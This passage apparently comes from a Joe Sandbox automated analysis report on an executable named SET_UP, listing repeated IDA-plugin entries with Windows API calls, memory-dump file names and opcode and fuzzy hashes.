                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Object$Stock
                                                                                                                                                                                                  • String ID: Tahoma
                                                                                                                                                                                                  • API String ID: 1996491644-3580928618
                                                                                                                                                                                                  • Opcode ID: 400f672a75e37640fbe65fa224d46fb3a10987ca09ef0562b8b36577cfda5645
                                                                                                                                                                                                  • Instruction ID: 24037335a8bc220ab76c8a1de525a884eb314a5dbcc0dfb6aaa0ece5b58e74f7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 400f672a75e37640fbe65fa224d46fb3a10987ca09ef0562b8b36577cfda5645
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89F027B76013077AF92016625C46F6B2BACCF80BA1F04043BFB00FA2D4DBB89C424678
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(USER32.DLL), ref: 0041165E
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,UpdateLayeredWindow), ref: 0041166E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                  • String ID: USER32.DLL$UpdateLayeredWindow
                                                                                                                                                                                                  • API String ID: 1646373207-2914979848
                                                                                                                                                                                                  • Opcode ID: ed35c8285d8d9e1e7387e3b2deb10e0faa9c8185eab0763184a3de5dc6497a9a
                                                                                                                                                                                                  • Instruction ID: 80c039138614cf4ed0b5f9c3d8497f52df943aa376e78e92a2aa118b1f6e38a9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed35c8285d8d9e1e7387e3b2deb10e0faa9c8185eab0763184a3de5dc6497a9a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26E0C23224024ABB9F025FE29C04EEA3F6AEB18755B044061FE1891030D73BD870AB58
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(USER32,ChangeWindowMessageFilter), ref: 0041D5DB
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041D5E2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                  • String ID: ChangeWindowMessageFilter$USER32
                                                                                                                                                                                                  • API String ID: 1646373207-248887387
                                                                                                                                                                                                  • Opcode ID: b48c39b8c50d39a52fe6e676752571536bd972ba0636c313570aaa8384314e66
                                                                                                                                                                                                  • Instruction ID: c9d39129b6be10a1a1e331e6796f9c68c030495713b692bf8dd07ddc021f019e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b48c39b8c50d39a52fe6e676752571536bd972ba0636c313570aaa8384314e66
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDE0C2F07903432AEB201F729C0AF9B3684AB80B22F2806727E19C01F5DBECC4C0A11D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(shlwapi.dll,0041D51D,?,?,00000000,000000FF), ref: 0041D53A
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,StrFormatByteSizeW), ref: 0041D54A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: StrFormatByteSizeW$shlwapi.dll
• API String ID: 1646373207-185409461
• Opcode ID: b203fed92501ed053aaf1bb69547acbfcb2e89e3d492f8f70d0da35cbef85442
• Instruction ID: 2e8d10b274debed8895be0b270c0cfc3e86524b0f6d0243191e10ae1b7e091bc
• Opcode Fuzzy Hash: b203fed92501ed053aaf1bb69547acbfcb2e89e3d492f8f70d0da35cbef85442
• Instruction Fuzzy Hash: 23D017712443C2ABDF028FA28C04E1B7BAABB80746F240C69B960C1060DB29D018AA09
APIs
• GetModuleHandleW.KERNEL32(USER32.DLL,004116CA,0000E90A,00000000,?,00000002), ref: 00411626
• GetProcAddress.KERNEL32(00000000,SetLayeredWindowAttributes), ref: 00411636
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: SetLayeredWindowAttributes$USER32.DLL
• API String ID: 1646373207-3073883528
• Opcode ID: a2c14b7b69bec452ca353ae96697d4451319434a8970597fe0a92918df3826db
• Instruction ID: bde9565b2693d460876b8f24ebcc5819461b521e0d5bf4f494051f1a0495bf1c
• Opcode Fuzzy Hash: a2c14b7b69bec452ca353ae96697d4451319434a8970597fe0a92918df3826db
• Instruction Fuzzy Hash: C6D05E71244393AB8F018FB2CC04E6B7AA9BF90743F080C6DB960C1070DB2AC118AB0E
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2f2f0478cb90aeb6b040e367a9566f242fac6388cdb383537fb241f1d1cabe17
• Instruction ID: f18d8c5aca745e7118a3682bb7c42d2371121375998e048df9a84a79eced6fc5
• Opcode Fuzzy Hash: 2f2f0478cb90aeb6b040e367a9566f242fac6388cdb383537fb241f1d1cabe17
• Instruction Fuzzy Hash: FA91E672D01114AADF21AFAEDC81A9F7F78EB54364F24057FF814A6290D7398D408B6D
APIs
• ReadFile.KERNEL32(0000010C,0000010C,00000000,0000010C,00000000,00000001,?,?), ref: 004A1AE0
• GetLastError.KERNEL32 ref: 004A1AEA
• ReadFile.KERNEL32(?,?,00000001,0000010C,00000000), ref: 004A1BB0
• GetLastError.KERNEL32 ref: 004A1BBA
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID:
• API String ID: 1948546556-0
• Opcode ID: 7cda671187150bc083be67b697f1499b3ffbd55bcf65c6f02cd13432b14b04e3
• Instruction ID: 22b9f92d54a873c26f6310d1dfbd7a8e634c42dc3e48f486ef77826805365ca4
• Opcode Fuzzy Hash: 7cda671187150bc083be67b697f1499b3ffbd55bcf65c6f02cd13432b14b04e3
• Instruction Fuzzy Hash: 8B51A7346443899FDF218F58C8847AA7BB0BF27315F14449BE8618B3B1D378D946CB69
APIs
• WriteFile.KERNEL32(?,?,?,00000000,00000000,00000002,00508FBC,00508FBC), ref: 004A1FA9
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 5f71bd9f4b30a49d9fd1c5775c0499a104ef2b4afc58fccc5e3b6b11dcf8c51f
• Instruction ID: fa960aba0f47fcc12a841f69d33f50f88100bff9ddd78bb40f720d0be586ea8f
• Opcode Fuzzy Hash: 5f71bd9f4b30a49d9fd1c5775c0499a104ef2b4afc58fccc5e3b6b11dcf8c51f
• Instruction Fuzzy Hash: CA51D031904248EFCB11CF68C984ADE7BF4FF66344F1081AAF9159B2A1D774DA40DB69
APIs
• lstrcpynW.KERNEL32(004B8EF4,?,00000104,?,?,?,?,?,?,?,004B8EE2,?), ref: 004B8F22
• GetFileTime.KERNEL32(00000000,004B8EE2,?,?,?,?,?,?,?,?,?,004B8EE2,?), ref: 004B8F43
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004B8EE2,?), ref: 004B8F52
• GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,004B8EE2,?), ref: 004B8F73
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: File$AttributesSizeTimelstrcpyn
• String ID:
• API String ID: 1499663573-0
• Opcode ID: 41e4a547913c984589b36b8e74b49e47be8e0dd4eacf0fe454b1b7573e501ef8
• Instruction ID: 9edc1834e99d1d2eb06a4d9f35e6da745e1b8b32c249a5dfe75214eaa3991122
• Opcode Fuzzy Hash: 41e4a547913c984589b36b8e74b49e47be8e0dd4eacf0fe454b1b7573e501ef8
• Instruction Fuzzy Hash: 92316FB2500209AFD711DF61C885FEBB7BCBB14350F104A2EF156C7691EB74A985CBA4
APIs
• __EH_prolog.LIBCMT ref: 004B5EBC
  • Part of subcall function 004C657B: TlsGetValue.KERNEL32(0050B044,?,00000000,004C4B8C,004111C1,004C4BA8,004B5FEA,004B9143,?,00000000,?,004AEEBC,00000000,00000000,00000000,00000000), ref: 004C65BA
                                                                                                                                                                                                    • Part of subcall function 004B60C0: GetCurrentThreadId.KERNEL32 ref: 004B60D3
                                                                                                                                                                                                    • Part of subcall function 004B60C0: SetWindowsHookExW.USER32(000000FF,V,00000000,00000000), ref: 004B60E3
                                                                                                                                                                                                  • SetEvent.KERNEL32(?,Function_000C4BEF), ref: 004B5F78
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004B5F81
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004B5F88
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCurrentEventH_prologHandleHookObjectSingleThreadValueWaitWindows
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3726718227-0
                                                                                                                                                                                                  • Opcode ID: aa40b39999d112c5efc0f2eb7aad891f38c3c153a6e246c614cb707fc88aa021
                                                                                                                                                                                                  • Instruction ID: ad4b30656a7963245859738abd4c11cf75e6096271a1a2d74e0e23e8edb0b0d3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa40b39999d112c5efc0f2eb7aad891f38c3c153a6e246c614cb707fc88aa021
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6731C435600605DFCB14EFA5C984FAEF7B1FF08314B10456EE102972A2D778EA05CBA8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000001,00000000,?,?), ref: 00421789
                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000003,00000000,00000000,?,?,?), ref: 004217BA
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000003), ref: 004217C7
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000003), ref: 004217CF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Close$CreateQueryValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2495337196-0
                                                                                                                                                                                                  • Opcode ID: 8ed7a6e882857e5c2c9f245c9fe8f18630eea1d9fba9ad4baa5b32b3de14ec81
                                                                                                                                                                                                  • Instruction ID: 84ee58df59d8203c5bdcd8f158001bebc26cc250c6a1f7bec96dbed6ef5e3b05
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed7a6e882857e5c2c9f245c9fe8f18630eea1d9fba9ad4baa5b32b3de14ec81
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9215C71A01128BACB219FA2DC48EDFBFBCEF44794F104466B519E2190D7B48A84DBA5
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8CAE
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,0049B392,?,00000000,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8CC1
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,0049B392,?,?,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8D0D
                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8D25
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$CompareString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 376665442-0
                                                                                                                                                                                                  • Opcode ID: 92feb035c5d2fa4473386bf032988dffe11230512ac25e2f1803e3f70c81a7c5
                                                                                                                                                                                                  • Instruction ID: 3e49b5a23b367b31cbc147386a3b318945d71659a9f284a3cc509549e12b337f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92feb035c5d2fa4473386bf032988dffe11230512ac25e2f1803e3f70c81a7c5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3521477290024DEBDF218F84CC41DDEBFB1FF59364F10412AFA10A61A0D73A9922DBA4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004B9101
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 004B9112
                                                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004B9121
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 004B912C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$File$ErrorLast$LocalSystem
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1172841412-0
                                                                                                                                                                                                  • Opcode ID: 8aed24414badc3968f83a43decd0ab5d1b8cbe5cdf34bf0d1d02216328c53bdf
                                                                                                                                                                                                  • Instruction ID: 42bd361f49f1fd2321d6424cf0eca1b57f1e6e82198632a67778f5f1b0e10034
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aed24414badc3968f83a43decd0ab5d1b8cbe5cdf34bf0d1d02216328c53bdf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1119319A01215A6CF00BBE69805DEFB7BEAF85704B04404BF901A7232EA78C941C7BC
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetPropA.USER32(?,?), ref: 004AC29D
• SendMessageA.USER32(?,00001944,00000000,?), ref: 004AC2C2
• SendMessageA.USER32(?,00001943,00000000,?), ref: 004AC2D7
• RemovePropA.USER32(?,?), ref: 004AC2ED
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
